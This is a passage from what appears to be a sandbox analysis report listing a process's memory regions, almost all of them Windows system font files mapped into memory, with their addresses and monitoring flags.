start_va = 0x6580000
end_va = 0x6d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006580000"
filename = ""
Region:
id = 496
start_va = 0xee0000
end_va = 0xf74fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "himalaya.ttf"
filename = "\\Windows\\Fonts\\himalaya.ttf" (normalized: "c:\\windows\\fonts\\himalaya.ttf")
Region:
id = 497
start_va = 0xee0000
end_va = 0xf74fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "himalaya.ttf"
filename = "\\Windows\\Fonts\\himalaya.ttf" (normalized: "c:\\windows\\fonts\\himalaya.ttf")
Region:
id = 498
start_va = 0x6d80000
end_va = 0x8228fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 499
start_va = 0x6d80000
end_va = 0x8228fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 500
start_va = 0x4ff0000
end_va = 0x5dc6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjhbd.ttf"
filename = "\\Windows\\Fonts\\msjhbd.ttf" (normalized: "c:\\windows\\fonts\\msjhbd.ttf")
Region:
id = 501
start_va = 0x4ff0000
end_va = 0x5dc6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjhbd.ttf"
filename = "\\Windows\\Fonts\\msjhbd.ttf" (normalized: "c:\\windows\\fonts\\msjhbd.ttf")
Region:
id = 502
start_va = 0x6d80000
end_va = 0x8242fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 503
start_va = 0x6d80000
end_va = 0x8242fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 504
start_va = 0x4ff0000
end_va = 0x5dddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyhbd.ttf"
filename = "\\Windows\\Fonts\\msyhbd.ttf" (normalized: "c:\\windows\\fonts\\msyhbd.ttf")
Region:
id = 505
start_va = 0x4ff0000
end_va = 0x5dddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyhbd.ttf"
filename = "\\Windows\\Fonts\\msyhbd.ttf" (normalized: "c:\\windows\\fonts\\msyhbd.ttf")
Region:
id = 506
start_va = 0x6d80000
end_va = 0x8c39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliu.ttc"
filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc")
Region:
id = 507
start_va = 0x6d80000
end_va = 0x8c39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliu.ttc"
filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc")
Region:
id = 508
start_va = 0x6d80000
end_va = 0x8c39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliu.ttc"
filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc")
Region:
id = 509
start_va = 0x6d80000
end_va = 0x8c39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliu.ttc"
filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc")
Region:
id = 510
start_va = 0x6d80000
end_va = 0x8dbdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliub.ttc"
filename = "\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc")
Region:
id = 511
start_va = 0x6d80000
end_va = 0x8dbdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliub.ttc"
filename = "\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc")
Region:
id = 512
start_va = 0x6d80000
end_va = 0x8dbdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliub.ttc"
filename = "\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc")
Region:
id = 513
start_va = 0x6d80000
end_va = 0x8dbdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mingliub.ttc"
filename = "\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc")
Region:
id = 514
start_va = 0x970000
end_va = 0x9c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "monbaiti.ttf"
filename = "\\Windows\\Fonts\\monbaiti.ttf" (normalized: "c:\\windows\\fonts\\monbaiti.ttf")
Region:
id = 515
start_va = 0x970000
end_va = 0x9c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "monbaiti.ttf"
filename = "\\Windows\\Fonts\\monbaiti.ttf" (normalized: "c:\\windows\\fonts\\monbaiti.ttf")
Region:
id = 516
start_va = 0x4ff0000
end_va = 0x58b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msgothic.ttc"
filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: "c:\\windows\\fonts\\msgothic.ttc")
Region:
id = 517
start_va = 0x4ff0000
end_va = 0x58b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msgothic.ttc"
filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: "c:\\windows\\fonts\\msgothic.ttc")
Region:
id = 518
start_va = 0x4ff0000
end_va = 0x58b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msgothic.ttc"
filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: "c:\\windows\\fonts\\msgothic.ttc")
Region:
id = 519
start_va = 0x4ff0000
end_va = 0x58b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msgothic.ttc"
filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: "c:\\windows\\fonts\\msgothic.ttc")
Region:
id = 520
start_va = 0x4ff0000
end_va = 0x5987fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msmincho.ttc"
filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc")
Region:
id = 521
start_va = 0x4ff0000
end_va = 0x5987fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msmincho.ttc"
filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc")
Region:
id = 522
start_va = 0x4ff0000
end_va = 0x5987fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msmincho.ttc"
filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc")
Region:
id = 523
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mvboli.ttf"
filename = "\\Windows\\Fonts\\mvboli.ttf" (normalized: "c:\\windows\\fonts\\mvboli.ttf")
Region:
id = 524
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mvboli.ttf"
filename = "\\Windows\\Fonts\\mvboli.ttf" (normalized: "c:\\windows\\fonts\\mvboli.ttf")
Region:
id = 525
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntailu.ttf"
filename = "\\Windows\\Fonts\\ntailu.ttf" (normalized: "c:\\windows\\fonts\\ntailu.ttf")
Region:
id = 526
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntailu.ttf"
filename = "\\Windows\\Fonts\\ntailu.ttf" (normalized: "c:\\windows\\fonts\\ntailu.ttf")
Region:
id = 527
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntailub.ttf"
filename = "\\Windows\\Fonts\\ntailub.ttf" (normalized: "c:\\windows\\fonts\\ntailub.ttf")
Region:
id = 528
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntailub.ttf"
filename = "\\Windows\\Fonts\\ntailub.ttf" (normalized: "c:\\windows\\fonts\\ntailub.ttf")
Region:
id = 529
start_va = 0x970000
end_va = 0x9dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nyala.ttf"
filename = "\\Windows\\Fonts\\nyala.ttf" (normalized: "c:\\windows\\fonts\\nyala.ttf")
Region:
id = 530
start_va = 0x970000
end_va = 0x9dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nyala.ttf"
filename = "\\Windows\\Fonts\\nyala.ttf" (normalized: "c:\\windows\\fonts\\nyala.ttf")
Region:
id = 531
start_va = 0x8b0000
end_va = 0x8d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "phagspa.ttf"
filename = "\\Windows\\Fonts\\phagspa.ttf" (normalized: "c:\\windows\\fonts\\phagspa.ttf")
Region:
id = 532
start_va = 0x8b0000
end_va = 0x8d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "phagspa.ttf"
filename = "\\Windows\\Fonts\\phagspa.ttf" (normalized: "c:\\windows\\fonts\\phagspa.ttf")
Region:
id = 533
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "phagspab.ttf"
filename = "\\Windows\\Fonts\\phagspab.ttf" (normalized: "c:\\windows\\fonts\\phagspab.ttf")
Region:
id = 534
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "phagspab.ttf"
filename = "\\Windows\\Fonts\\phagspab.ttf" (normalized: "c:\\windows\\fonts\\phagspab.ttf")
Region:
id = 535
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "plantc.ttf"
filename = "\\Windows\\Fonts\\plantc.ttf" (normalized: "c:\\windows\\fonts\\plantc.ttf")
Region:
id = 536
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "plantc.ttf"
filename = "\\Windows\\Fonts\\plantc.ttf" (normalized: "c:\\windows\\fonts\\plantc.ttf")
Region:
id = 537
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "raavi.ttf"
filename = "\\Windows\\Fonts\\raavi.ttf" (normalized: "c:\\windows\\fonts\\raavi.ttf")
Region:
id = 538
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "raavi.ttf"
filename = "\\Windows\\Fonts\\raavi.ttf" (normalized: "c:\\windows\\fonts\\raavi.ttf")
Region:
id = 539
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "raavib.ttf"
filename = "\\Windows\\Fonts\\raavib.ttf" (normalized: "c:\\windows\\fonts\\raavib.ttf")
Region:
id = 540
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "raavib.ttf"
filename = "\\Windows\\Fonts\\raavib.ttf" (normalized: "c:\\windows\\fonts\\raavib.ttf")
Region:
id = 541
start_va = 0xee0000
end_va = 0xf77fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoesc.ttf"
filename = "\\Windows\\Fonts\\segoesc.ttf" (normalized: "c:\\windows\\fonts\\segoesc.ttf")
Region:
id = 542
start_va = 0xee0000
end_va = 0xf77fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoesc.ttf"
filename = "\\Windows\\Fonts\\segoesc.ttf" (normalized: "c:\\windows\\fonts\\segoesc.ttf")
Region:
id = 543
start_va = 0xee0000
end_va = 0xf73fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoescb.ttf"
filename = "\\Windows\\Fonts\\segoescb.ttf" (normalized: "c:\\windows\\fonts\\segoescb.ttf")
Region:
id = 544
start_va = 0xee0000
end_va = 0xf73fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoescb.ttf"
filename = "\\Windows\\Fonts\\segoescb.ttf" (normalized: "c:\\windows\\fonts\\segoescb.ttf")
Region:
id = 545
start_va = 0xee0000
end_va = 0xf5efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 546
start_va = 0xee0000
end_va = 0xf5efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 547
start_va = 0xee0000
end_va = 0xf59fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuib.ttf"
filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf")
Region:
id = 548
start_va = 0xee0000
end_va = 0xf59fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuib.ttf"
filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf")
Region:
id = 549
start_va = 0x970000
end_va = 0x9cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuii.ttf"
filename = "\\Windows\\Fonts\\segoeuii.ttf" (normalized: "c:\\windows\\fonts\\segoeuii.ttf")
Region:
id = 550
start_va = 0x970000
end_va = 0x9cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuii.ttf"
filename = "\\Windows\\Fonts\\segoeuii.ttf" (normalized: "c:\\windows\\fonts\\segoeuii.ttf")
Region:
id = 551
start_va = 0x970000
end_va = 0x9d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuiz.ttf"
filename = "\\Windows\\Fonts\\segoeuiz.ttf" (normalized: "c:\\windows\\fonts\\segoeuiz.ttf")
Region:
id = 552
start_va = 0x970000
end_va = 0x9d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuiz.ttf"
filename = "\\Windows\\Fonts\\segoeuiz.ttf" (normalized: "c:\\windows\\fonts\\segoeuiz.ttf")
Region:
id = 553
start_va = 0x970000
end_va = 0x9d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisb.ttf"
filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf")
Region:
id = 554
start_va = 0x970000
end_va = 0x9d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisb.ttf"
filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf")
Region:
id = 555
start_va = 0x970000
end_va = 0x9c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuil.ttf"
filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf")
Region:
id = 556
start_va = 0x970000
end_va = 0x9c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuil.ttf"
filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf")
Region:
id = 557
start_va = 0xee0000
end_va = 0xf5efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisym.ttf"
filename = "\\Windows\\Fonts\\seguisym.ttf" (normalized: "c:\\windows\\fonts\\seguisym.ttf")
Region:
id = 558
start_va = 0xee0000
end_va = 0xf5efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisym.ttf"
filename = "\\Windows\\Fonts\\seguisym.ttf" (normalized: "c:\\windows\\fonts\\seguisym.ttf")
Region:
id = 559
start_va = 0x970000
end_va = 0x9b1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shruti.ttf"
filename = "\\Windows\\Fonts\\shruti.ttf" (normalized: "c:\\windows\\fonts\\shruti.ttf")
Region:
id = 560
start_va = 0x970000
end_va = 0x9b1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shruti.ttf"
filename = "\\Windows\\Fonts\\shruti.ttf" (normalized: "c:\\windows\\fonts\\shruti.ttf")
Region:
id = 561
start_va = 0x8b0000
end_va = 0x8e9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shrutib.ttf"
filename = "\\Windows\\Fonts\\shrutib.ttf" (normalized: "c:\\windows\\fonts\\shrutib.ttf")
Region:
id = 562
start_va = 0x8b0000
end_va = 0x8e9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shrutib.ttf"
filename = "\\Windows\\Fonts\\shrutib.ttf" (normalized: "c:\\windows\\fonts\\shrutib.ttf")
Region:
id = 563
start_va = 0x4ff0000
end_va = 0x5e8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simsun.ttc"
filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc")
Region:
id = 564
start_va = 0x4ff0000
end_va = 0x5e8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simsun.ttc"
filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc")
Region:
id = 565
start_va = 0x4ff0000
end_va = 0x5e8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simsun.ttc"
filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc")
Region:
id = 566
start_va = 0x4ff0000
end_va = 0x5ea1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simsunb.ttf"
filename = "\\Windows\\Fonts\\simsunb.ttf" (normalized: "c:\\windows\\fonts\\simsunb.ttf")
Region:
id = 567
start_va = 0x4ff0000
end_va = 0x5ea1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simsunb.ttf"
filename = "\\Windows\\Fonts\\simsunb.ttf" (normalized: "c:\\windows\\fonts\\simsunb.ttf")
Region:
id = 568
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sylfaen.ttf"
filename = "\\Windows\\Fonts\\sylfaen.ttf" (normalized: "c:\\windows\\fonts\\sylfaen.ttf")
Region:
id = 569
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sylfaen.ttf"
filename = "\\Windows\\Fonts\\sylfaen.ttf" (normalized: "c:\\windows\\fonts\\sylfaen.ttf")
Region:
id = 570
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taile.ttf"
filename = "\\Windows\\Fonts\\taile.ttf" (normalized: "c:\\windows\\fonts\\taile.ttf")
Region:
id = 571
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taile.ttf"
filename = "\\Windows\\Fonts\\taile.ttf" (normalized: "c:\\windows\\fonts\\taile.ttf")
Region:
id = 572
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taileb.ttf"
filename = "\\Windows\\Fonts\\taileb.ttf" (normalized: "c:\\windows\\fonts\\taileb.ttf")
Region:
id = 573
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taileb.ttf"
filename = "\\Windows\\Fonts\\taileb.ttf" (normalized: "c:\\windows\\fonts\\taileb.ttf")
Region:
id = 574
start_va = 0xee0000
end_va = 0xfabfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "times.ttf"
filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf")
Region:
id = 575
start_va = 0xee0000
end_va = 0xfabfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "times.ttf"
filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf")
Region:
id = 576
start_va = 0xee0000
end_va = 0xf81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesi.ttf"
filename = "\\Windows\\Fonts\\timesi.ttf" (normalized: "c:\\windows\\fonts\\timesi.ttf")
Region:
id = 577
start_va = 0xee0000
end_va = 0xf81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesi.ttf"
filename = "\\Windows\\Fonts\\timesi.ttf" (normalized: "c:\\windows\\fonts\\timesi.ttf")
Region:
id = 578
start_va = 0xee0000
end_va = 0xfadfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesbd.ttf"
filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf")
Region:
id = 579
start_va = 0xee0000
end_va = 0xfadfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesbd.ttf"
filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf")
Region:
id = 580
start_va = 0xee0000
end_va = 0xf77fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesbi.ttf"
filename = "\\Windows\\Fonts\\timesbi.ttf" (normalized: "c:\\windows\\fonts\\timesbi.ttf")
Region:
id = 581
start_va = 0xee0000
end_va = 0xf77fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesbi.ttf"
filename = "\\Windows\\Fonts\\timesbi.ttf" (normalized: "c:\\windows\\fonts\\timesbi.ttf")
Region:
id = 582
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tunga.ttf"
filename = "\\Windows\\Fonts\\tunga.ttf" (normalized: "c:\\windows\\fonts\\tunga.ttf")
Region:
id = 583
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tunga.ttf"
filename = "\\Windows\\Fonts\\tunga.ttf" (normalized: "c:\\windows\\fonts\\tunga.ttf")
Region:
id = 584
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tungab.ttf"
filename = "\\Windows\\Fonts\\tungab.ttf" (normalized: "c:\\windows\\fonts\\tungab.ttf")
Region:
id = 585
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tungab.ttf"
filename = "\\Windows\\Fonts\\tungab.ttf" (normalized: "c:\\windows\\fonts\\tungab.ttf")
Region:
id = 586
start_va = 0x8b0000
end_va = 0x8effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vrinda.ttf"
filename = "\\Windows\\Fonts\\vrinda.ttf" (normalized: "c:\\windows\\fonts\\vrinda.ttf")
Region:
id = 587
start_va = 0x8b0000
end_va = 0x8effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vrinda.ttf"
filename = "\\Windows\\Fonts\\vrinda.ttf" (normalized: "c:\\windows\\fonts\\vrinda.ttf")
Region:
id = 588
start_va = 0x8b0000
end_va = 0x8eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vrindab.ttf"
filename = "\\Windows\\Fonts\\vrindab.ttf" (normalized: "c:\\windows\\fonts\\vrindab.ttf")
Region:
id = 589
start_va = 0x8b0000
end_va = 0x8eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vrindab.ttf"
filename = "\\Windows\\Fonts\\vrindab.ttf" (normalized: "c:\\windows\\fonts\\vrindab.ttf")
Region:
id = 590
start_va = 0x970000
end_va = 0x9c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shonar.ttf"
filename = "\\Windows\\Fonts\\Shonar.ttf" (normalized: "c:\\windows\\fonts\\shonar.ttf")
Region:
id = 591
start_va = 0x970000
end_va = 0x9c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shonar.ttf"
filename = "\\Windows\\Fonts\\Shonar.ttf" (normalized: "c:\\windows\\fonts\\shonar.ttf")
Region:
id = 592
start_va = 0x970000
end_va = 0x9b9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shonarb.ttf"
filename = "\\Windows\\Fonts\\Shonarb.ttf" (normalized: "c:\\windows\\fonts\\shonarb.ttf")
Region:
id = 593
start_va = 0x970000
end_va = 0x9b9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shonarb.ttf"
filename = "\\Windows\\Fonts\\Shonarb.ttf" (normalized: "c:\\windows\\fonts\\shonarb.ttf")
Region:
id = 594
start_va = 0x970000
end_va = 0x9c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyi.ttf"
filename = "\\Windows\\Fonts\\msyi.ttf" (normalized: "c:\\windows\\fonts\\msyi.ttf")
Region:
id = 595
start_va = 0x970000
end_va = 0x9c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyi.ttf"
filename = "\\Windows\\Fonts\\msyi.ttf" (normalized: "c:\\windows\\fonts\\msyi.ttf")
Region:
id = 596
start_va = 0xee0000
end_va = 0xf8afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 597
start_va = 0xee0000
end_va = 0xf8afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 598
start_va = 0xee0000
end_va = 0xf7efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahomabd.ttf"
filename = "\\Windows\\Fonts\\tahomabd.ttf" (normalized: "c:\\windows\\fonts\\tahomabd.ttf")
Region:
id = 599
start_va = 0xee0000
end_va = 0xf7efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahomabd.ttf"
filename = "\\Windows\\Fonts\\tahomabd.ttf" (normalized: "c:\\windows\\fonts\\tahomabd.ttf")
Region:
id = 600
start_va = 0xee0000
end_va = 0xf7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 601
start_va = 0xee0000
end_va = 0xf7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 602
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsa.ttf"
filename = "\\Windows\\Fonts\\angsa.ttf" (normalized: "c:\\windows\\fonts\\angsa.ttf")
Region:
id = 603
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsa.ttf"
filename = "\\Windows\\Fonts\\angsa.ttf" (normalized: "c:\\windows\\fonts\\angsa.ttf")
Region:
id = 604
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsai.ttf"
filename = "\\Windows\\Fonts\\angsai.ttf" (normalized: "c:\\windows\\fonts\\angsai.ttf")
Region:
id = 605
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsai.ttf"
filename = "\\Windows\\Fonts\\angsai.ttf" (normalized: "c:\\windows\\fonts\\angsai.ttf")
Region:
id = 606
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsab.ttf"
filename = "\\Windows\\Fonts\\angsab.ttf" (normalized: "c:\\windows\\fonts\\angsab.ttf")
Region:
id = 607
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsab.ttf"
filename = "\\Windows\\Fonts\\angsab.ttf" (normalized: "c:\\windows\\fonts\\angsab.ttf")
Region:
id = 608
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsaz.ttf"
filename = "\\Windows\\Fonts\\angsaz.ttf" (normalized: "c:\\windows\\fonts\\angsaz.ttf")
Region:
id = 609
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsaz.ttf"
filename = "\\Windows\\Fonts\\angsaz.ttf" (normalized: "c:\\windows\\fonts\\angsaz.ttf")
Region:
id = 610
start_va = 0x8b0000
end_va = 0x8e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparaj.ttf"
filename = "\\Windows\\Fonts\\aparaj.ttf" (normalized: "c:\\windows\\fonts\\aparaj.ttf")
Region:
id = 611
start_va = 0x8b0000
end_va = 0x8e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparaj.ttf"
filename = "\\Windows\\Fonts\\aparaj.ttf" (normalized: "c:\\windows\\fonts\\aparaj.ttf")
Region:
id = 612
start_va = 0x8b0000
end_va = 0x8e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparajb.ttf"
filename = "\\Windows\\Fonts\\aparajb.ttf" (normalized: "c:\\windows\\fonts\\aparajb.ttf")
Region:
id = 613
